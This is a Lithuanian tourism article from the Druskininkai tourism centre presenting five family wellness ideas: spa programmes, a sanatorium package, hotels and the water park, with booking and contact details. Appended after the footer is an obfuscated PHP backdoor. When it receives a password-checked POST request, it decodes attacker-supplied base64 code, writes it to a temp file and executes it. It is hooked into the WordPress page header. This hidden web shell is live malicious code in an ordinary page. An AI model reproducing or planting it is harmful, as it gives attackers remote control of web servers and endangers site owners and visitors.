fbpx
A A
A A

TOP5 sveikatinimo idėjos šeimai Druskininkuose

2023.05.19

Brangiausias laikas su šeima! Buvimas kartu su šeima tiek tėvams, tiek vaikams suteikia artumo ir bendrystės jausmą. Druskininkuose su šeima patirtų akimirkų neužmiršite visą gyvenimą, o priežasčių čia sugrįžti daugybė!  Pramogaukite su šeima, pasilepinkite grožio procedūromis, sustiprinkite imunitetą bei atgaukite jėgas!

Sveikatinimo programa „Laiminga šeima“

Sveikatingumo ir poilsio kompleksas „Grand SPA Lietuva“ kviečia išbandyti savo unikalią sveikatinimo programą šeimai „Laiminga šeima“! Jos metu jūsų lauks po 3 procedūros kiekvienam asmeniui, žolelių arbata SPA kavinėje (1 kartas), mineralinio vandens gėrimas biuvetėje (rekomenduojama 3 kartus per dieną), neriboti apsilankymai komplekso vandens parke ir pirtyse ir komplekso treniruoklių salėje viešnagės metu bei dviejų kartų maitinimas viešbučio restorane. Procedūros sustiprins imunitetą, o laikas praleistas kartu paliks gerus prisiminimus.
⏱ Minimali trukmė: 2 nakvynės
🗸 Rezervuokite čia.
🗸 Vaikai nemokamai iki 3 m.

Poilsio akimirka sveikatingumo ir poilsio komplekse „Grand SPA Lietuva“

Perskyrimas

Sanatorinis gydymas „Šeima“

„Eglės sanatorija“ kviečia išbandyti naujieną – specialią 2 naktų sanatorinio gydymo programą „Šeima“. Gydytojas įvertinęs jūsų sveikatos būklę, sudarys individualų sveikatinimo planą, kurio metu išbandys net po 5 procedūras (per parą) kiekvienas šeimos narys. O taip pat jūsų lauks trijų kartų maitinimas ir užkandžių baras, hidrorelaksacija kasdien, neriboti apsilankymai baseinų ir pirčių komplekse kiekvieną vakarą, papildomos grupinės treniruotės „Būk aktyvus“ bei laisvalaikio užsiėmimai (muzikiniai vakarai, teniso kortai, biliardas ir kt.)

⏱ Trukmė: 2 nakvynės
🗸 Rezervuokite čia.
🗸 Vaikai nemokamai iki 4 m.

Poilsis šeimai „Eglės sanatorijoje“

Perskyrimas

Poilsis šeimai su baseino ir pirčių malonumais

Pavasaris, taip puikus laikas praleisti laiką su šeima! Reabilitacijos ir poilsio centras „UPA Medical SPA” – tai poilsiui pritaikyta vieta, kurioje vaikams smagu, o tėveliai gali atsipalaiduoti. Įsikūrę nuostabiame Druskininkų pušyne galėsite kasdien mėgautis baseino ir pirčių malonumais, lankytis treniruočių salėje, sustiprinti imunitetą specialiomis procedūromis vaikams. O taip pat jūsų šeimos čia lauks žaidimų erdvė bei erdvūs kambariai (galite rinktis apartamentus su virtuvėlėmis). Rezervuokite poilsį visai savo šeimai!

⏱ Minimali trukmė: 1 nakvynė
🗸 Rezervuokite čia.
🗸 Vaikai nemokamai iki 5 m.

Haloterapijos procedūra sveikatos ir poilsio namuose „UPA Medical SPA“

Perskyrimas

 

Atokiau nuo miesto šurmulio, šalia K. Dineikos sveikatingumo parko ir vos kelios minutės pėsčiomis iki kitų pramogų bei prekybos centrų įsikūrusiame 3* viešbutyje „De Lita“ praleisite jaukų poilsi su šeima. Viešnagės metu jūsų šeimos lauks nakvynė erdviuose šeimyniniuose apartamentuose, pusryčiai viešbučio restorane bei dviejų patiekalų pietūs arba vakarienė visai šeimai viešbučio restorane.

⏱ Minimali trukmė: 1 nakvynė.
🗸 Rezervuokite čia.

Perskyrimas

Poilsis ir vandens pramogos su šeima

Druskininkų vandens parkas – tai tobula vieta visai šeimai, kur tėveliai gali pramogauti su šeima ir atsipalaiduoti suaugusiems skirtoje erdvėje. Trijų žvaigždučių viešbutis sukurtas taip, kad jo svečiai galėtų jaustis patogiai ir laisvai, o viską, ko reikia tobulam poilsiui rastų net neišėję į lauką. Vandens parko linksmybės, grožio ritualai, masažai ir SPA FLORES centro procedūros prisidės prie nuostabios savijautos ir palepins ne tik svečių kūną, bet ir praskaidrins mintis bei pakels nuotaiką. Ieškantys azartiškų pramogų ar naktinių nuotykių, juos atras laisvalaikio centre su boulingu bei žaidimų aparatais.

⏱ Trukmė: 1 nakvynė
🗸 Rezervuokite čia.
🗸 Vaikai nemokamai: iki 2 m.

Pramogos su šeima Druskininkų „Vandens parke“

Druskininkai – tai kurortas, kuriame stebuklingos sveikatos versmės susijungia su gamtos harmonija, o šimtametės sveikatinimo tradicijos dera su poilsio visai šeimai galimybėmis. Keliauti su šeima į Druskininkus jau tapo nauja įsitvirtinusia tradicija – būtent čia kolekcionuojami brangiausi šeimos atostogų momentai, sutvirtėja tarpusavio ryšiai ir darna. Kurkite savo šeimos tradicijas Druskininkuose!

LAISVALAIKIO IDĖJOS SU ŠEIMA.

VISI KURORTO RENGINIAI KURORTE.

Perskyrimas

Daugiau turizmo informacijos galite sužinoti telefonu +370 313 51 777, el. paštu information@druskininkai.lt bei apsilankę turizmo informacijos centre adresu M. K. Čiurlionio g. 65, Druskininkai.

Parengė Druskininkų turizmo ir verslo informacijos centras

www.druskininkai.lt

Visit Druskininkai
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}